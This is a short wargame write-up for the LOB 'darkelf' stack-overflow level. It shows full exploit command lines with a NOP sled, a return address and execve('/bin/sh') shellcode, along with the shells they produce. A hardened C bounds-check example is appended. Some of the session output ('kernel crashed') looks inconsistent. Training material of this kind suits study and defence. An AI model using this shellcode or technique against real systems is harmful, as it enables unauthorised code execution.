argv[1] is length-checked and the buffer is zeroed.
So the payload is passed in a new argument, argv[2], instead.
Add code to the darkelf source that prints the address of argv[2],
then point RET at that address to get a shell.
[wolfman@localhost tmp]$ ls
copyelf darkelf darkelf.c
[wolfman@localhost tmp]$ ./copyelf `python -c 'print "\x90"*44 + "\xbf"*4 +" "+ "\x90"*1000'`
argv[2] = 0xbffff85a
������������������������������������������������
Segmentation fault (core dumped)
[wolfman@localhost tmp]$ ./darkelf
argv error
[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\x90"*44 + "\x5a\xf8\xff\xbf" + " " + "\x90"*10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
��������������������������������������������Z���
bash$ id
uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)
bash$
bash$ exit
exit
[wolfman@localhost tmp]$ ../darkelf `python -c 'print "\x90"*44 + "\x5a\xf8\xff\xbf" + " " + "\x90"*10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
��������������������������������������������Z���
bash$ my-pass
euid = 506
kernel crashed
bash$
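The check described above bounds argv[1] against a fixed limit rather than against the destination buffer, and leaves argv[2] unchecked entirely. As an added example (not code from the LOB binary or from this writeup), the weak check is modelled next to a hardened copy whose bound is the destination size and which applies to every argument; the 40-byte buffer and 48-byte limit are assumed values, not taken from the page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE  40   /* size of the stack buffer (assumed for this model) */
#define ARG_LIMIT 48   /* fixed cap on argv[1] in the weak check (assumed) */

/* Models the weak check: argv[1] must not exceed a fixed limit. The limit
 * is unrelated to BUF_SIZE, so an input of 41..48 bytes passes the check
 * and still overruns the 40-byte buffer when it is copied. */
int weak_check_accepts(const char *arg1) {
    return strlen(arg1) <= ARG_LIMIT;
}

/* Hardened copy: the bound is the destination size including the NUL, and
 * over-long input is rejected rather than silently truncated. */
int safe_copy(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (n >= dst_size) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened handler: every argument gets the same bound, so moving the
 * payload from argv[1] to argv[2] no longer bypasses anything.
 * Returns 0 on success, 1 for missing arguments, 2 for an over-long one. */
int handle_args(int argc, char **argv) {
    char buffer[BUF_SIZE];
    if (argc < 2) return 1;
    for (int i = 1; i < argc; i++) {
        if (safe_copy(buffer, sizeof buffer, argv[i]) != 0) return 2;
    }
    return 0;
}

int main(int argc, char **argv) {
    int rc = handle_args(argc, argv);
    if (rc == 1) puts("argv error");
    else if (rc == 2) puts("argument too long");
    return rc;
}
```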